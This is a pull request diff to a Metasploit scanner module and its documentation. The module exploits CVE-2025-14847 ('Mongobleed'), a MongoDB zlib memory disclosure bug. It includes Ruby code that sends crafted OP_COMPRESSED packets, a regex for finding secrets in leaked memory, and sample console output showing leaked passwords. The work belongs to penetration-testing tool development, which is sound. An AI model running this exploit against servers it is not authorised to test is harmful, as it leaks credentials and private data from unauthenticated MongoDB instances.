### PR TITLE
Improve mongobleed checks

### DIFF
--- a/documentation/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.md
+++ b/documentation/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.md
@@ -1,8 +1,11 @@
 ## Vulnerable Application
 
-This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
+This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to
+as "Mongobleed."
 
-By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
+By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed
+uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the
+decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
 
 The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
 - Database credentials
@@ -11,7 +14,8 @@ The vulnerability allows unauthenticated remote attackers to leak server memory 
 - Connection strings
 - Application data
 
-**Note:** This vulnerability only affects servers with zlib compression enabled. The module will check for zlib compression support before attempting exploitation.
+This vulnerability only affects servers with zlib compression enabled. The module checks for zlib compression support before attempting
+exploitation.
 
 ### Vulnerable Versions
 
@@ -39,43 +43,13 @@ Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
 ## Verification Steps
 
 1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
-2. Start the MongoDB service
+2. Start the MongoDB service with zlib compression enabled
 3. Start msfconsole
 4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
 5. `set RHOSTS <target>`
-6. `set ACTION CHECK` then `run` (optional - quick vulnerability check)
-7. `set ACTION SCAN` then `run` (full exploitation)
+6. `check` to verify the target is vulnerable
+7. `run` to perform the full memory leak scan
 8. Verify that memory contents are leaked and saved to loot
-
-## Actions
-
-The module supports two actions:
-
-### SCAN (Default)
-Full exploitation that scans memory offsets and extracts leaked data.
-
-### CHECK
-Quick vulnerability check using the Wiz Research "magic packet" technique for deterministic vulnerability detection. This action:
-
-1. Checks the MongoDB version against known vulnerable versions
-2. Verifies that zlib compression is enabled on the server
-3. Sends a specially crafted packet that triggers the memory leak
-4. Analyzes the response for BSON signatures in leaked memory
-
-This provides a quick, low-impact way to confirm vulnerability without performing a full memory scan.
-
-```
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
-ACTION => CHECK
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
-
-[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
-[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
-[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
-```
 
 ## Options
 
@@ -95,13 +69,15 @@ Padding added to the claimed uncompressed buffer size. Default: `500`
 Minimum bytes to report as an interesting leak in the output. Default: `10`
 
 ### QUICK_SCAN
-Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
+Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may
+miss some leaks. Default: `false`
 
 ### REPEAT
 Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
 
 ### REUSE_CONNECTION
-Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each probe. This can improve scanning speed by 10-50x. Default: `true`
+Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each
+probe. This can improve scanning speed by 10-50x. Default: `true`
 
 ## Advanced Options
 
@@ -124,29 +100,38 @@ Show progress every N offsets. Set to 0 to disable. Default: `500`
 Save all raw MongoDB responses to a separate loot file for offline analysis with tools like `strings`, `binwalk`, etc. Default: `false`
 
 ### SAVE_JSON
-Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful for automated processing or integration with other tools. Default: `true`
+Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful
+for automated processing or integration with other tools. Default: `true`
 
 ## Scenarios
 
-### Using the CHECK Action
+### Vulnerability Check
+
+The module supports the standard `check` command. It fingerprints the MongoDB version, verifies zlib compression is enabled, and sends
+a crafted magic packet to confirm exploitability.
 
 ```
 msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
 RHOSTS => 192.168.1.100
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
-ACTION => CHECK
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
 
-[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
-[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
-[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
+[+] 192.168.1.100:27017 - The target is vulnerable. Server leaks memory via crafted OP_COMPRESSED message (MongoDB 4.4.26)
 ```
 
-### MongoDB 7.0.14 on Linux (with Connection Reuse)
+When pointed at a non-MongoDB service, the check correctly identifies it as not vulnerable:
+
+```
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.200
+RHOSTS => 192.168.1.200
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RPORT 80
+RPORT => 80
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
+
+[-] 192.168.1.200:80 - The target is not exploitable. Target does not appear to be a MongoDB service
+```
+
+### MongoDB 4.4.26 on Windows
 
 ```
 msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
@@ -154,26 +139,25 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1
 RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
 [*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
-[+] 192.168.1.100:27017 - offset=20   len=82  : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
-[+] 192.168.1.100:27017 - offset=163  len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
-[+] 192.168.1.100:27017 - offset=501  len=40  : id bson type in element with field name
-[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
+[+] 192.168.1.100:27017 - offset=77   len=39  : conn38248] end connection 10.0.0.5:36845
+[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 3 leaks found - ETA: 49s
 [+] 192.168.1.100:27017 - offset=757  len=12  : password=abc
-[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
-[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
+[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password'
+[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 5 leaks found - ETA: 42s
 ...
 
 [!] 192.168.1.100:27017 - Potential secrets detected:
-[!] 192.168.1.100:27017 -   - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
+[!] 192.168.1.100:27017 -   - Pattern 'password' at offset 757
 
-[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
-[+] 192.168.1.100:27017 - Unique fragments: 13
+[+] 192.168.1.100:27017 - Total leaked: 703 bytes
+[+] 192.168.1.100:27017 - Unique fragments: 8
 [+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
+[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
 [*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
@@ -182,12 +166,15 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
+REPEAT => 3
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
+MAX_OFFSET => 16384
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 [*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
@@ -211,15 +198,16 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
+QUICK_SCAN => true
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 [*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
 [*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
-[+] 192.168.1.100:27017 - offset=20   len=45  : connection string fragment...
 [+] 192.168.1.100:27017 - offset=128  len=23  : mongodb://admin:pass...
 
 [+] 192.168.1.100:27017 - Total leaked: 234 bytes
@@ -228,33 +216,52 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 [+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
 ```
 
+### Server Without zlib Compression
+
+```
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check rhost=192.168.123.144
+
+[*] 192.168.123.144:27017 - The target is not exploitable. Server does not have zlib compression enabled (MongoDB 4.4.26)
+
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run rhost=192.168.123.144
+
+[*] 192.168.123.144:27017 - MongoDB version: 4.4.26
+[+] 192.168.123.144:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
+[*] 192.168.123.144:27017 - Server compressors: none
+[-] 192.168.123.144:27017 - Server does not support zlib compression - vulnerability not exploitable
+[*] 192.168.123.144:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
+[*] 192.168.123.144:27017 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
 ### JSON Report Output
 
-The JSON report includes full metadata for each leak:
+When `SAVE_JSON` is enabled (the default), the module saves a structured JSON report alongside the raw loot. This includes full
+metadata for each leak fragment:
 
 ```json
 {
   "scan_info": {
     "target": "192.168.1.100",
     "port": 27017,
-    "mongodb_version": "7.0.14",
+    "mongodb_version": "4.4.26",
     "scan_time": "2025-12-30T14:30:00Z",
     "cve": "CVE-2025-14847"
   },
   "summary": {
-    "total_leaks": 13,
-    "total_bytes": 1703,
-    "secrets_found": 2
+    "total_leaks": 8,
+    "total_bytes": 703,
+    "secrets_found": 1
   },
   "secrets": [
     "Pattern 'password' at offset 757..."
   ],
   "leaks": [
     {
-      "offset": 20,
-      "length": 82,
-      "data_base64": "W2Nvbm4zODI0OF0gZW5kIGNvbm5lY3Rpb24...",
-      "data_printable": "[conn38248] end connection 10.0.0.5:36845...",
+      "offset": 77,
+      "length": 39,
+      "data_base64": "Y29ubjM4MjQ4XSBlbmQgY29ubmVjdGlvbi4uLg==",
+      "data_printable": "conn38248] end connection 10.0.0.5:36845",
       "has_secret": false,
       "timestamp": "2025-12-30T14:30:01Z"
     }
@@ -262,8 +269,9 @@ The JSON report includes full metadata for each leak:
 }
 ```
 
-You can process the JSON with standard tools:
-```bash
+The JSON report can be processed with standard tools:
+
+```
 # Extract all leaked data
 cat mongobleed.json | jq -r '.leaks[].data_printable'
 
@@ -278,43 +286,33 @@ cat mongobleed.json | jq '.summary'
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set SAVE_RAW_RESPONSES true
+SAVE_RAW_RESPONSES => true
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 ...
 
-[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
-[+] 192.168.1.100:27017 - Unique fragments: 13
+[+] 192.168.1.100:27017 - Total leaked: 703 bytes
+[+] 192.168.1.100:27017 - Unique fragments: 8
 [+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
 [+] 192.168.1.100:27017 - Raw responses saved to: /root/.msf4/loot/20251230_mongobleed_raw.bin
 ```
 
 You can then analyze the raw responses offline:
-```bash
+
+```
 strings /root/.msf4/loot/20251230_mongobleed_raw.bin | grep -i password
-```
-
-### Server Without zlib Compression
-
-```
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
-
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
-[*] 192.168.1.100:27017 - Server compressors: snappy
-[-] 192.168.1.100:27017 - Server does not support zlib compression - vulnerability not exploitable
-[*] 192.168.1.100:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
-[*] Auxiliary module execution completed
 ```
 
 ## Technical Details
 
 ### How the Vulnerability Works
 
-The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated buffer size) instead of the actual decompressed data length. This allowed attackers to:
+The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated
+buffer size) instead of the actual decompressed data length. This allowed attackers to:
 
 1. Send a compressed message claiming a large uncompressed size
 2. MongoDB allocates a buffer based on the claimed size
@@ -324,7 +322,12 @@ The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was
 
 ### Detection Technique
 
-The Wiz Research "magic packet" used in the `check` method sends a minimal BSON document `{"a": 1}` inside a malformed `OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON signatures or field name errors containing unexpected data, the vulnerability is confirmed.
+The Wiz Research "magic packet" used in the `check` command sends a minimal BSON document `{"a": 1}` inside a malformed
+`OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON parsing errors, the vulnerability
+is confirmed, since a patched server rejects the inflated size before parsing.
+
+The module validates that the target is actually a MongoDB service before probing, preventing false positives against non-MongoDB
+services. Standard MongoDB error message strings are filtered from leak results to avoid reporting server error text as leaked memory.
 
 ## References
 

--- a/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb
+++ b/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb
@@ -43,12 +43,7 @@ class MetasploitModule < Msf::Auxiliary
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
-        },
-        'Actions' => [
-          ['SCAN', { 'Description' => 'Scan and exploit memory leak vulnerability' }],
-          ['CHECK', { 'Description' => 'Quick vulnerability check using Wiz magic packet' }]
-        ],
-        'DefaultAction' => 'SCAN'
+        }
       )
     )
 
@@ -56,13 +51,13 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RPORT(27017),
         OptInt.new('MIN_OFFSET', [true, 'Minimum BSON document length offset', 20]),
-        OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset', 8192]),
+        OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset (higher = more memory, slower)', 8192]),
         OptInt.new('STEP_SIZE', [true, 'Offset increment (higher = faster, less thorough)', 1]),
         OptInt.new('BUFFER_PADDING', [true, 'Padding added to buffer size claim', 500]),
-        OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak', 10]),
-        OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only', false]),
-        OptInt.new('REPEAT', [true, 'Number of scan passes (more passes = more data)', 1]),
-        OptBool.new('REUSE_CONNECTION', [true, 'Reuse TCP connection for faster scanning', true])
+        OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak in output', 10]),
+        OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only, faster but may miss leaks', false]),
+        OptInt.new('REPEAT', [true, 'Number of scan passes - memory changes over time so more passes capture more data', 1]),
+        OptBool.new('REUSE_CONNECTION', [true, 'Reuse TCP connection for faster scanning (10-50x speedup)', true])
       ]
     )
 
@@ -73,8 +68,8 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('SECRETS_PATTERN', [true, 'Regex pattern to detect sensitive data', 'password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth']),
         OptBool.new('FORCE_EXPLOIT', [true, 'Attempt exploitation even if version check indicates not vulnerable', false]),
         OptInt.new('PROGRESS_INTERVAL', [true, 'Show progress every N offsets (0 to disable)', 500]),
-        OptBool.new('SAVE_RAW_RESPONSES', [true, 'Save all raw responses for offline analysis', false]),
-        OptBool.new('SAVE_JSON', [true, 'Save leaked data as JSON with metadata', true])
+        OptBool.new('SAVE_RAW_RESPONSES', [true, 'Save all raw responses for offline analysis with tools like strings, binwalk, etc.', false]),
+        OptBool.new('SAVE_JSON', [true, 'Save leaked data as JSON report with metadata for automated processing', true])
       ]
     )
   end
@@ -100,73 +95,56 @@ class MetasploitModule < Msf::Auxiliary
   ].join.freeze
 
   #
-  # Quick vulnerability check using Wiz Research magic packet
+  # Standard check method for the framework's `check` command.
+  # Returns CheckCode values based on version fingerprinting and
+  # a magic packet probe to confirm exploitability.
   #
-  def run_check(ip)
-    print_status("Running vulnerability check against #{ip}:#{rport}...")
-
-    # First get version info
+  def check_host(_ip)
+    # First, confirm we are talking to MongoDB. If neither version detection
+    # nor compressor negotiation succeeds, the target is not MongoDB and we
+    # should not probe further to avoid false positives.
     version_info = get_mongodb_version
+    compressors = get_server_compressors
+    is_mongodb = !version_info.nil? || !compressors.nil?
+
+    return Exploit::CheckCode::Safe('Target does not appear to be a MongoDB service') unless is_mongodb
+
     if version_info
       version_str = version_info[:version]
-      print_status("MongoDB version: #{version_str}")
       vuln_status = check_vulnerable_version(version_str)
 
-      case vuln_status
-      when :patched
-        print_error("Version #{version_str} is PATCHED - not vulnerable")
-        return :safe
-      when :vulnerable, :vulnerable_eol
-        print_good("Version #{version_str} appears vulnerable, confirming with probe...")
-      when :unknown
-        print_warning("Version #{version_str} - vulnerability status unknown, testing...")
-      end
-    else
-      print_warning('Could not determine MongoDB version, testing anyway...')
+      return Exploit::CheckCode::Safe("Version #{version_str} is patched") if vuln_status == :patched
     end
 
-    # Check if zlib compression is enabled
-    compressors = get_server_compressors
-    if compressors
-      print_status("Server compressors: #{compressors.join(', ')}")
-      unless compressors.include?('zlib')
-        print_error('Server does not have zlib compression enabled (required for this vulnerability)')
-        return :safe
-      end
-    else
-      print_warning('Could not determine server compression support, testing anyway...')
+    if compressors && !compressors.include?('zlib')
+      version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''
+      compressor_msg = compressors.empty? ? '' : " - server compressors: #{compressors.join(', ')}"
+      return Exploit::CheckCode::Safe("Server does not have zlib compression enabled#{version_msg}#{compressor_msg}")
     end
 
     # Send the Wiz magic packet to confirm exploitability
-    print_status('Sending Wiz magic packet to confirm vulnerability...')
     result = send_magic_packet_check
     case result
     when :vulnerable
       version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''
-      print_good("VULNERABLE - Server leaks memory via CVE-2025-14847#{version_msg}")
-
-      # Report the vulnerability
-      report_vuln(
-        host: ip,
-        port: rport,
-        proto: 'tcp',
-        name: name,
-        refs: references,
-        info: "Confirmed vulnerable via magic packet check#{version_msg}"
-      )
-      return :vulnerable
+      return Exploit::CheckCode::Vulnerable("Server leaks memory via crafted OP_COMPRESSED message#{version_msg}")
     when :safe
-      print_status('Server did not leak memory (may be patched or zlib disabled)')
-      return :safe
-    when :detected
-      version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''
-      print_warning("Server appears to be MongoDB#{version_msg}, but could not confirm vulnerability")
-      print_status('Try running with ACTION=SCAN for full exploitation attempt')
-      return :detected
+      return Exploit::CheckCode::Safe('Server did not leak memory')
     else
-      print_error('Could not determine vulnerability status')
-      return :unknown
+      # :unknown — probe was inconclusive, fall back to version-based detection
+      if version_info
+        vuln_status = check_vulnerable_version(version_info[:version])
+        if vuln_status == :vulnerable || vuln_status == :vulnerable_eol
+          return Exploit::CheckCode::Appears("Version #{version_info[:version]} is in the vulnerable range")
+        end
+
+        return Exploit::CheckCode::Detected("MongoDB #{version_info[:version]} detected")
+      end
+
+      Exploit::CheckCode::Unknown('Magic packet probe was inconclusive and version unknown')
     end
+  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error
+    Exploit::CheckCode::Unknown('Could not connect to the target')
   end
 
   #
@@ -181,40 +159,47 @@ class MetasploitModule < Msf::Auxiliary
     disconnect
 
     return :unknown if response.nil? || response.empty?
+    return :unknown if response.length < 16
 
-    # Check for BSON signatures in response indicating memory leak
-    # The Wiz template checks for 'BSON' in the zlib-decoded response or raw response
+    # Validate this looks like a MongoDB wire protocol response before
+    # inspecting content. Without this gate, HTTP error pages or other
+    # protocol responses can cause false positives.
+    msg_len = response[0, 4].unpack1('V')
+    opcode = response[12, 4].unpack1('V')
+    return :unknown unless msg_len >= 16 && msg_len <= response.length
+    return :unknown unless [OP_REPLY, OP_MSG, OP_COMPRESSED].include?(opcode)
+
     leaked = false
 
-    # Try to decompress and check
+    # Try to decompress OP_COMPRESSED responses and check for leak indicators
+    payload = nil
     begin
-      if response.length > 25
-        opcode = response[12, 4].unpack1('V')
-        if opcode == OP_COMPRESSED
-          raw = Zlib::Inflate.inflate(response[25..])
-          leaked = true if raw&.upcase&.include?('BSON')
-        end
+      if opcode == OP_COMPRESSED && response.length > 25
+        payload = Zlib::Inflate.inflate(response[25, msg_len - 25])
       end
     rescue Zlib::Error
-      # Decompression failed, check raw response
+      # Decompression failed — can't meaningfully scan compressed bytes
+      return :unknown
     end
 
-    # Check raw response for BSON markers
-    leaked = true if response.upcase.include?('BSON')
+    # For uncompressed OP_MSG or OP_REPLY, extract the payload
+    payload ||= if opcode == OP_REPLY && response.length > 36
+                  response[36, msg_len - 36]
+                elsif opcode == OP_MSG && response.length > 16
+                  response[16, msg_len - 16]
+                end
 
-    # Also check for other leak indicators (field name errors, type errors)
-    leaked = true if response =~ /field name '[^']+'/
-    leaked = true if response =~ /unrecognized.*type/i
+    if payload
+      # Only match MongoDB-specific error patterns, not generic strings
+      leaked = true if payload.include?('BSON')
+      leaked = true if payload =~ /field name '[^']+'/
+      leaked = true if payload =~ /unrecognized BSON type/i
+    end
 
     return :vulnerable if leaked
 
-    # If we got a valid MongoDB response but no leak, server might be patched
-    if response.length >= 16
-      msg_len = response.unpack1('V')
-      return :safe if msg_len > 0 && msg_len <= response.length
-    end
-
-    :detected
+    # Valid MongoDB response but no leak — server is likely patched
+    :safe
   rescue ::Rex::ConnectionError, ::Errno::ECONNRESET
     :unknown
   rescue StandardError => e
@@ -233,25 +218,24 @@ class MetasploitModule < Msf::Auxiliary
   #
   def get_server_compressors
     connect
-    # Send hello command to get server capabilities
+    # Try hello first (MongoDB 5.0+), fall back to isMaster (MongoDB 4.x)
     response = send_command('admin', { 'hello' => 1, 'compression' => ['zlib', 'snappy', 'zstd'] })
+    response ||= send_command('admin', { 'isMaster' => 1, 'compression' => ['zlib', 'snappy', 'zstd'] })
     disconnect
 
     return nil if response.nil?
 
-    # Parse compression field from response
+    # The response is raw BSON, not JSON. Compressor names appear as
+    # null-terminated strings within the BSON compression array field.
+    # A simple string inclusion check reliably detects them.
     compressors = []
-    if response =~ /compression.*?\[(.*?)\]/m
-      compressor_list = ::Regexp.last_match(1)
-      compressors << 'zlib' if compressor_list.include?('zlib')
-      compressors << 'snappy' if compressor_list.include?('snappy')
-      compressors << 'zstd' if compressor_list.include?('zstd')
-    end
+    compressors << 'zlib' if response.include?('zlib')
+    compressors << 'snappy' if response.include?('snappy')
+    compressors << 'zstd' if response.include?('zstd')
 
-    # Also check raw bytes for compressor strings
-    compressors << 'zlib' if response.include?('zlib') && !compressors.include?('zlib')
-
-    compressors.empty? ? nil : compressors
+    compressors
+  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error
+    raise
   rescue StandardError
     nil
   ensure
@@ -294,19 +278,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    case action.name
-    when 'CHECK'
-      run_check(ip)
-    when 'SCAN'
-      run_scan(ip)
-    else
-      print_error("Unknown action: #{action.name}")
-    end
+    run_scan(ip)
   end
 
   def run_scan(ip)
     # Version detection and vulnerability check
-    version_info = get_mongodb_version
+    begin
+      version_info = get_mongodb_version
+    rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error => e
+      print_error("Cannot reach #{Rex::Socket.to_authority(ip, rport)} - #{e.message}")
+      return
+    end
 
     if version_info
       version_str = version_info[:version]
@@ -329,15 +311,25 @@ class MetasploitModule < Msf::Auxiliary
         print_warning("Version #{version_str} - vulnerability status unknown")
         print_status('Proceeding with exploitation attempt...')
       end
-    else
-      print_warning('Could not determine MongoDB version')
-      print_status('Proceeding with exploitation attempt...')
     end
 
     # Check compression support
-    compressors = get_server_compressors
+    begin
+      compressors = get_server_compressors
+    rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error => e
+      print_error("Cannot reach #{Rex::Socket.to_authority(ip, rport)} - #{e.message}")
+      return
+    end
+
+    # If neither version detection nor compressor negotiation succeeded,
+    # the target is not a MongoDB service — don't waste time scanning.
+    if version_info.nil? && compressors.nil?
+      print_error('Target does not appear to be a MongoDB service')
+      return
+    end
+
     if compressors
-      print_status("Server compressors: #{compressors.join(', ')}")
+      print_status("Server compressors: #{compressors.empty? ? 'none' : compressors.join(', ')}")
       unless compressors.include?('zlib')
         print_error('Server does not support zlib compression - vulnerability not exploitable')
         print_status('The CVE-2025-14847 vulnerability requires zlib compression to be enabled')
@@ -365,11 +357,10 @@ class MetasploitModule < Msf::Auxiliary
 
     # Parse BSON response to extract version
     parse_build_info(response)
-  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
-    vprint_error("Connection error during version check: #{e.message}")
-    nil
   rescue StandardError => e
     vprint_error("Error getting MongoDB version: #{e.message}")
+    raise if e.is_a?(::Rex::ConnectionError) || e.is_a?(::Errno::ECONNRESET) || e.is_a?(::Timeout::Error)
+
     nil
   ensure
     begin
@@ -405,12 +396,17 @@ class MetasploitModule < Msf::Auxiliary
     response_header = sock.get_once(16, 5)
     return nil if response_header.nil? || response_header.length < 16
 
-    msg_len, _req_id, _resp_to, opcode = response_header.unpack('VVVV')
+    msg_len, _req_id, resp_to, opcode = response_header.unpack('VVVV')
+
+    # Validate this is a genuine MongoDB OP_REPLY: opcode must be 1 and
+    # responseTo must match our requestID. This prevents interpreting
+    # responses from non-MongoDB services (e.g. HTTP) as valid data.
     return nil unless opcode == OP_REPLY
+    return nil unless resp_to == request_id
 
     # Read rest of response
     remaining = msg_len - 16
-    return nil if remaining <= 0
